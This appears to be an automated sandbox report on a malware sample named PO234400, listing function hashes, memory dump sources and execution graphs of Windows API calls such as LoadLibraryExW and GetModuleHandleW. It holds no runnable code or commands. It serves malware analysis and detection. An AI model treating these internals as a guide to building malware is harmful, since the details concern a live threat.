                                                    • Instruction ID: 88806ed9a1f5d985cfbfaf0db68fdf56f9c8293c592fb8e662c185c50182b694
                                                    • Opcode Fuzzy Hash: 6f2cdef6cbe2cf0dd777ad49689a56ebee77c3cd765a1104ee58a8f10b44c72f
                                                    • Instruction Fuzzy Hash: 2D01A2734053489BE7206A25CC84B76FFD9EF41735F28C55AEE094E2A6C3799840DBB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FFD758 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1376536439.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ffd000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6aad13a327a825f2eb2d99e3bc14a5b0b18a260033078373bd866cc39744088c
                                                    • Instruction ID: 975d21e395bc07474f0e6e614ecbeb9d1db1f8b3e184a58214c5a1d2532b7643
                                                    • Opcode Fuzzy Hash: 6aad13a327a825f2eb2d99e3bc14a5b0b18a260033078373bd866cc39744088c
                                                    • Instruction Fuzzy Hash: D0F062724053489EE7109A16DD84B72FFE8EF51735F18C45AED184F2A6C279A844CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 07B18A30 Relevance: .3, Instructions: 321COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72f70ba87b75dfc700eebd1c7c0e8414ec5fb696ac35c4bbd81989478172c4a4
                                                    • Instruction ID: 76ddec34e725ea48621a4468b902f5dcaa14a1d36131de7d09dda1d0f87c5a1f
                                                    • Opcode Fuzzy Hash: 72f70ba87b75dfc700eebd1c7c0e8414ec5fb696ac35c4bbd81989478172c4a4
                                                    • Instruction Fuzzy Hash: 32E1FBB4E00219CFDB14DFA8C5909AEFBB2FF89315F2481A9D418AB355D731A942CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B15688 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b24e3b44f25013f2e63603b5f9b5075a45a5c1d9e2c9cec898104947834eda5
                                                    • Instruction ID: 89d0c7b7717698d465aa922599bc27bd54668f16d5a753d130d2fd85f1775481
                                                    • Opcode Fuzzy Hash: 3b24e3b44f25013f2e63603b5f9b5075a45a5c1d9e2c9cec898104947834eda5
                                                    • Instruction Fuzzy Hash: D4E11CB4E00219CFDB24DFA9C580AAEFBB2FF89305F648169D418AB355D731A941CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B171E8 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96c381589786575d5263279765805bec6a66f4190968ba44de36bd483335c2b5
                                                    • Instruction ID: 284ce698b292527ef6689c6b7215b1878bde8e91c3673d2a296c376ebdcc5302
                                                    • Opcode Fuzzy Hash: 96c381589786575d5263279765805bec6a66f4190968ba44de36bd483335c2b5
                                                    • Instruction Fuzzy Hash: D2E11DB4E00219CFDB14DFA9C5909AEFBB2FF89305F248169D818A7355DB31A942CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B15EF8 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e886b980beae77ead8bc78bea54c278cc7ac2f399132da0dc24f174092d85f5f
                                                    • Instruction ID: a83b24c65bfed64961c1206d02d8eb11fdbe7c97d81639a7a9652af06e38d868
                                                    • Opcode Fuzzy Hash: e886b980beae77ead8bc78bea54c278cc7ac2f399132da0dc24f174092d85f5f
                                                    • Instruction Fuzzy Hash: 1AE1FCB4E00219CFDB14DFA9C5909AEFBB2FF89305F2481A9D418A7355DB31A941CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B15AC0 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c0ee1c0abd00d79b4f287e489472f7bd27689bfaa275d129641cffb8fd696e8f
                                                    • Instruction ID: 2ac986546ea9248494effe0ea980dc2e371dd198643d9f9f3202cb9bd26bb1cc
                                                    • Opcode Fuzzy Hash: c0ee1c0abd00d79b4f287e489472f7bd27689bfaa275d129641cffb8fd696e8f
                                                    • Instruction Fuzzy Hash: 6CE1FCB4E002198FDB24DF99C5909AEFBB2FF89305F64C169D418AB355D731A941CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012CD364 Relevance: .3, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 68e545555dc20f7cd9b80972cbd397caf1c2a35e0ab0a720cb609373a47ac4bd
                                                    • Instruction ID: da8e7f8c0d400d60c2fd0958a7178f0baddce99cc17ab40fc6b1d238b01cb5c0
                                                    • Opcode Fuzzy Hash: 68e545555dc20f7cd9b80972cbd397caf1c2a35e0ab0a720cb609373a47ac4bd
                                                    • Instruction Fuzzy Hash: 8AA18036E1021A8FCF15DFB4C5405AEBBB3FF84700B25866EEA15AB265DB31D909CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07B15653 Relevance: .2, Instructions: 154COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cd0399b8e78ca3b9dc21dfd844dc4b1c219d4a677bd897e578009bd9629aa655
                                                    • Instruction ID: 8c4a944738e353266890ff33317738ecc6fbc2aaa0a3405fd3fa8af7d1a4ca85
                                                    • Opcode Fuzzy Hash: cd0399b8e78ca3b9dc21dfd844dc4b1c219d4a677bd897e578009bd9629aa655
                                                    • Instruction Fuzzy Hash: 20513DB0E04219CFDB14DFA9C5545AEBBF2FF89304F2481AAD458AB215D7319A41CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:12.5%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:156
                                                    Total number of Limit Nodes:16
                                                    execution_graph 26286 691f9b0 26287 691fa18 CreateWindowExW 26286->26287 26289 691fad4 26287->26289 26290 691c7f0 26291 691c832 26290->26291 26292 691c838 LoadLibraryExW 26290->26292 26291->26292 26293 691c869 26292->26293 26294 160d688 26295 160d6b6 26294->26295 26298 160bd64 26295->26298 26297 160d6d6 26299 160bd6f 26298->26299 26300 160e38c 26299->26300 26303 6911050 26299->26303 26308 6911060 26299->26308 26300->26297 26304 691105c 26303->26304 26305 69110a5 26304->26305 26313 6911210 26304->26313 26318 6911200 26304->26318 26305->26300 26309 6911061 26308->26309 26310 69110a5 26309->26310 26311 6911210 3 API calls 26309->26311 26312 6911200 3 API calls 26309->26312 26310->26300 26311->26310 26312->26310 26314 6911211 26313->26314 26315 6911256 26314->26315 26323 6911269 26314->26323 26328 6911278 26314->26328 26315->26305 26319 6911204 26318->26319 26320 6911256 26319->26320 26321 6911269 3 API calls 26319->26321 26322 6911278 3 API calls 26319->26322 26320->26305 26321->26320 26322->26320 26324 6911272 26323->26324 26325 69112c8 26324->26325 26333 6911310 26324->26333 26341 6911328 26324->26341 26325->26325 26329 6911279 26328->26329 26330 69112c8 26329->26330 26331 6911310 3 API calls 26329->26331 26332 6911328 3 API calls 26329->26332 26331->26330 26332->26330 26334 6911324 26333->26334 26335 6911337 26334->26335 26349 69124f0 26334->26349 26353 69124e0 26334->26353 26357 691bf60 26335->26357 26365 691bf48 26335->26365 26336 6911371 26336->26325 26342 6911329 26341->26342 26343 6911337 26342->26343 26347 69124f0 3 API calls 26342->26347 26348 69124e0 3 API calls 26342->26348 26345 691bf60 3 API calls 26343->26345 26346 691bf48 3 API calls 26343->26346 26344 6911371 26344->26325 26345->26344 26346->26344 26347->26343 26348->26343 26350 69124f1 26349->26350 26351 69127f8 26350->26351 26352 6911060 3 API calls 26350->26352 26351->26335 26352->26351 26354 69124ec 26353->26354 26355 69127f8 26354->26355 26356 6911060 3 API calls 26354->26356 26355->26335 26356->26355 26358 691bf61 26357->26358 26359 691bf9d 26358->26359 26373 691c208 26358->26373 26377 691c1fb 26358->26377 26359->26336 26360 691bfdd 26382 691e0c0 26360->26382 26389 691e0af 26360->26389 26366 691bf54 26365->26366 26367 691bf3b 26366->26367 26369 691c208 3 API calls 26366->26369 26370 691c1fb 3 API calls 26366->26370 26367->26336 26368 691bfdd 26371 691e0c0 GetModuleHandleW 26368->26371 26372 691e0af GetModuleHandleW 26368->26372 26369->26368 26370->26368 26371->26367 26372->26367 26396 691c258 26373->26396 26405 691c248 26373->26405 26374 691c212 26374->26360 26378 691c208 26377->26378 26380 691c258 2 API calls 26378->26380 26381 691c248 2 API calls 26378->26381 26379 691c212 26379->26360 26380->26379 26381->26379 26383 691e0eb 26382->26383 26423 691e620 26383->26423 26429 691e5f0 26383->26429 26384 691e16e 26385 69195c0 GetModuleHandleW 26384->26385 26386 691e19a 26384->26386 26385->26386 26390 691e0c0 26389->26390 26394 691e620 GetModuleHandleW 26390->26394 26395 691e5f0 GetModuleHandleW 26390->26395 26391 691e16e 26392 69195c0 GetModuleHandleW 26391->26392 26393 691e19a 26391->26393 26392->26393 26394->26391 26395->26391 26397 691c269 26396->26397 26400 691c28c 26396->26400 26414 69195c0 26397->26414 26400->26374 26401 691c284 26401->26400 26402 691c490 GetModuleHandleW 26401->26402 26403 691c4bd 26402->26403 26403->26374 26406 691c28c 26405->26406 26407 691c269 26405->26407 26406->26374 26408 69195c0 GetModuleHandleW 26407->26408 26409 691c274 26408->26409 26409->26406 26413 691c4e0 GetModuleHandleW 26409->26413 26410 691c490 GetModuleHandleW 26412 691c4bd 26410->26412 26411 691c284 26411->26406 26411->26410 26412->26374 26413->26411 26415 691c448 GetModuleHandleW 26414->26415 26417 691c274 26415->26417 26417->26400 26418 691c4e0 26417->26418 26419 691c4c3 26418->26419 26420 691c4e3 26418->26420 26419->26401 26420->26419 26421 69195c0 GetModuleHandleW 26420->26421 26422 691c504 26421->26422 26422->26401 26425 691e64d 26423->26425 26424 691e6ce 26425->26424 26435 691e790 26425->26435 26446 691e8b5 26425->26446 26457 691e780 26425->26457 26430 691e593 26429->26430 26430->26384 26430->26429 26431 691e57d 26430->26431 26432 691e790 GetModuleHandleW 26430->26432 26433 691e780 GetModuleHandleW 26430->26433 26434 691e8b5 GetModuleHandleW 26430->26434 26431->26384 26432->26431 26433->26431 26434->26431 26445 691e791 26435->26445 26436 691ed2e 26436->26424 26437 69195c0 GetModuleHandleW 26438 691ed89 26437->26438 26439 69195c0 GetModuleHandleW 26438->26439 26444 691ef45 26438->26444 26440 691eecb 26439->26440 26441 69195c0 GetModuleHandleW 26440->26441 26440->26444 26442 691ef19 26441->26442 26443 69195c0 GetModuleHandleW 26442->26443 26442->26444 26443->26444 26444->26424 26445->26436 26445->26437 26445->26438 26449 691e7b3 26446->26449 26447 691ed2e 26447->26424 26448 69195c0 GetModuleHandleW 26450 691ed89 26448->26450 26449->26447 26449->26448 26449->26450 26451 69195c0 GetModuleHandleW 26450->26451 26456 691ef45 26450->26456 26452 691eecb 26451->26452 26453 69195c0 GetModuleHandleW 26452->26453 26452->26456 26454 691ef19 26453->26454 26455 69195c0 GetModuleHandleW 26454->26455 26454->26456 26455->26456 26456->26424 26467 691e784 26457->26467 26458 691ed2e 26458->26424 26459 69195c0 GetModuleHandleW 26460 691ed89 26459->26460 26461 69195c0 GetModuleHandleW 26460->26461 26466 691ef45 26460->26466 26462 691eecb 26461->26462 26463 69195c0 GetModuleHandleW 26462->26463 26462->26466 26464 691ef19 26463->26464 26465 69195c0 GetModuleHandleW 26464->26465 26464->26466 26465->26466 26466->26424 26467->26458 26467->26459 26467->26460 26468 160c118 26469 160c194 DuplicateHandle 26468->26469 26470 160c1ae 26469->26470

                                                    Executed Functions

                                                    Function 0691C258 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1880 691c258-691c267 1881 691c293-691c297 1880->1881 1882 691c269-691c276 call 69195c0 1880->1882 1884 691c299-691c2a3 1881->1884 1885 691c2ab-691c2ec 1881->1885 1888 691c278-691c286 call 691c4e0 1882->1888 1889 691c28c 1882->1889 1884->1885 1891 691c2f9-691c307 1885->1891 1892 691c2ee-691c2f6 1885->1892 1888->1889 1898 691c3c8-691c488 1888->1898 1889->1881 1893 691c309-691c30e 1891->1893 1894 691c32b-691c32d 1891->1894 1892->1891 1896 691c310-691c317 call 69195cc 1893->1896 1897 691c319 1893->1897 1899 691c330-691c337 1894->1899 1901 691c31b-691c329 1896->1901 1897->1901 1929 691c490-691c4bb GetModuleHandleW 1898->1929 1930 691c48a-691c48d 1898->1930 1902 691c344-691c34b 1899->1902 1903 691c339-691c341 1899->1903 1901->1899 1906 691c358-691c361 1902->1906 1907 691c34d-691c355 1902->1907 1903->1902 1910 691c363-691c36b 1906->1910 1911 691c36e-691c373 1906->1911 1907->1906 1910->1911 1912 691c391-691c395 1911->1912 1913 691c375-691c37c 1911->1913 1918 691c39b-691c39e 1912->1918 1913->1912 1915 691c37e-691c38e call 691429c call 69195dc 1913->1915 1915->1912 1920 691c3c1-691c3c7 1918->1920 1921 691c3a0-691c3be 1918->1921 1921->1920 1931 691c4c4-691c4d8 1929->1931 1932 691c4bd-691c4c3 1929->1932 1930->1929 1932->1931
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2611001531.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6910000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 3e5e4e7b78305b3ce61de15494cca85b33096bd2257bec2984712abc68ccafc9
                                                    • Instruction ID: eb3841f25fb3dd9edd78d807189f294e612a5cbba4acbb35b6c762ee66e13e3e
                                                    • Opcode Fuzzy Hash: 3e5e4e7b78305b3ce61de15494cca85b33096bd2257bec2984712abc68ccafc9
                                                    • Instruction Fuzzy Hash: 6D714670A00B09CFDB64DF6AD44475ABBF5FF88204F20892DD49ADBA50D778E846CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0691F9A5 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1936 691f9a5-691fa16 1938 691fa21-691fa28 1936->1938 1939 691fa18-691fa1e 1936->1939 1940 691fa33-691fa6b 1938->1940 1941 691fa2a-691fa30 1938->1941 1939->1938 1942 691fa73-691fad2 CreateWindowExW 1940->1942 1941->1940 1943 691fad4-691fada 1942->1943 1944 691fadb-691fb13 1942->1944 1943->1944 1948 691fb20 1944->1948 1949 691fb15-691fb18 1944->1949 1950 691fb21 1948->1950 1949->1948 1950->1950
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0691FAC2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2611001531.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6910000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: dff50af6481fe7f75560a2572d56d8324de873898d2f1bfdc29d10ca544469e0
                                                    • Instruction ID: 1bc3ade7b8fb6ddfc45abee73f540ba33fd87f5fa17c907fb1f3f84194824eab
                                                    • Opcode Fuzzy Hash: dff50af6481fe7f75560a2572d56d8324de873898d2f1bfdc29d10ca544469e0
                                                    • Instruction Fuzzy Hash: 0051BFB1D0034D9FDB14CFA9C884ADEBBB5BF88314F24812AE819AB250D775A845CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0691F9B0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1951 691f9b0-691fa16 1952 691fa21-691fa28 1951->1952 1953 691fa18-691fa1e 1951->1953 1954 691fa33-691fad2 CreateWindowExW 1952->1954 1955 691fa2a-691fa30 1952->1955 1953->1952 1957 691fad4-691fada 1954->1957 1958 691fadb-691fb13 1954->1958 1955->1954 1957->1958 1962 691fb20 1958->1962 1963 691fb15-691fb18 1958->1963 1964 691fb21 1962->1964 1963->1962 1964->1964
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0691FAC2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2611001531.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6910000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: dcc3028bd3469a76256a527b2294e17e945307788a851ebb5d6e0783204d89e1
                                                    • Instruction ID: d6e7096b5c280f3034cee63d788b97e4c64ee69182d93eb989f141d0ffb3f38f
                                                    • Opcode Fuzzy Hash: dcc3028bd3469a76256a527b2294e17e945307788a851ebb5d6e0783204d89e1
                                                    • Instruction Fuzzy Hash: C341ADB1D0034D9FDB14CF9AC884ADEBBF5BF88314F24812AE819AB250D775A945CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0160C1D8 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1965 160c1d8-160c306
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2607455879.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1600000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c4da9162d1b777e2aeb0859bf5e8e38758954e222a11a7f9ee8ec9a9e0cee298
                                                    • Instruction ID: a3dbadb303c2878f5ab955022baa1f69bbebaf3ad129ec77c34fdc620b9b4bb5
                                                    • Opcode Fuzzy Hash: c4da9162d1b777e2aeb0859bf5e8e38758954e222a11a7f9ee8ec9a9e0cee298
                                                    • Instruction Fuzzy Hash: FC41B3786463449FE715CF65E988A693BB3FF88311F204169EA518BBC6DB380941CF11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0691C7E8 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1983 691c7e8-691c7e9 1984 691c7cb 1983->1984 1985 691c7eb-691c830 1983->1985 1986 691c7d2-691c7d9 1984->1986 1987 691c7cd 1984->1987 1989 691c832-691c835 1985->1989 1990 691c838-691c867 LoadLibraryExW 1985->1990 1987->1986 1989->1990 1991 691c870-691c88d 1990->1991 1992 691c869-691c86f 1990->1992 1992->1991
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0691C85A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2611001531.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6910000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: f7c05064a5e342394a8d676d5684699f7c7931f8abc7facac41e679459356e33
                                                    • Instruction ID: dd1a13d8cfb9a27485873b61c4b975167cee8663b256d0b7d4bddf2f153c9927
                                                    • Opcode Fuzzy Hash: f7c05064a5e342394a8d676d5684699f7c7931f8abc7facac41e679459356e33
                                                    • Instruction Fuzzy Hash: 182118B6D003099FDB10DF9AD844ADEFBF8EB88320F20802AD515A7600C779A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0160C110 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1977 160c110-160c191 1978 160c194-160c1ac DuplicateHandle 1977->1978 1979 160c1b5-160c1d2 1978->1979 1980 160c1ae-160c1b4 1978->1980 1980->1979
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0160C19F
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2607455879.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1600000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 2923663e7de625834149537683cd6727f6bcfa46430fa3cda549371bdb405e71
                                                    • Instruction ID: d4957a0bb81b191d4f135e966a160a8acc340ffc6453e84341675fb3d46075d3
                                                    • Opcode Fuzzy Hash: 2923663e7de625834149537683cd6727f6bcfa46430fa3cda549371bdb405e71
                                                    • Instruction Fuzzy Hash: E621E2B5D002499FDB10CFAAD884AEEBFF5FB48311F24845AE918A3750C378A945CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0160C118 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1995 160c118-160c1ac DuplicateHandle 1997 160c1b5-160c1d2 1995->1997 1998 160c1ae-160c1b4 1995->1998 1998->1997
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0160C19F
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2607455879.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1600000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: d10dedfad26f99da47c527bbda229c5f5417a154b6831a5005c6edb7070ff157
                                                    • Instruction ID: 520fd8b2ee97ef6f32253bfae6d83c3da1757489bdea66790d4a1669a2d796a7
                                                    • Opcode Fuzzy Hash: d10dedfad26f99da47c527bbda229c5f5417a154b6831a5005c6edb7070ff157
                                                    • Instruction Fuzzy Hash: 6D21C4B59002499FDB10CFAAD884ADEFFF9FB48310F14845AE954A3350D378A954CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0691C7F0 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2001 691c7f0-691c830 2002 691c832-691c835 2001->2002 2003 691c838-691c867 LoadLibraryExW 2001->2003 2002->2003 2004 691c870-691c88d 2003->2004 2005 691c869-691c86f 2003->2005 2005->2004
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0691C85A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2611001531.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6910000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: fa18f7d4fa6d86fb4e99fb6ac3e01882f886d9934ca04d6cd084e7b4c70f610f
                                                    • Instruction ID: f60c5b25edc3900022b554278269349bf2904dbac2b4f78b9c101003d240b51d
                                                    • Opcode Fuzzy Hash: fa18f7d4fa6d86fb4e99fb6ac3e01882f886d9934ca04d6cd084e7b4c70f610f
                                                    • Instruction Fuzzy Hash: 4611E4B6D003498FDB10CF9AC484ADEFBF8AB89710F20842ED519A7610C779A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 069195C0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2008 69195c0-691c488 2010 691c490-691c4bb GetModuleHandleW 2008->2010 2011 691c48a-691c48d 2008->2011 2012 691c4c4-691c4d8 2010->2012 2013 691c4bd-691c4c3 2010->2013 2011->2010 2013->2012
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0691C274), ref: 0691C4AE
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2611001531.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6910000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 43eff9b1243faec42d9ff68f09971144ba41ecd31c2260f1996406d8981e6926
                                                    • Instruction ID: 2b0fb7dfc9d6e66cf949c7ce88b7802a62c31635cf615bee83e7ab358211b2bd
                                                    • Opcode Fuzzy Hash: 43eff9b1243faec42d9ff68f09971144ba41ecd31c2260f1996406d8981e6926
                                                    • Instruction Fuzzy Hash: 391102B5C04349CFDB10DF9AC444BEEFBF4EB88214F20841AD519A7650C379A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015AD01C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2607170773.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_15ad000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d07116e2ccfb95790203b0ad8b30cc34d145a6f9155f6bf4a120a344010b31fc
                                                    • Instruction ID: 01d636641c4dacb121fc900bc14311015495d40728de068f27854c37049b0abe
                                                    • Opcode Fuzzy Hash: d07116e2ccfb95790203b0ad8b30cc34d145a6f9155f6bf4a120a344010b31fc
                                                    • Instruction Fuzzy Hash: 65214275284300DFDB10EF64D884B2ABBB1FB88314F60C96DD80A0F682D33AC407CA62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015AD006 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2607170773.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
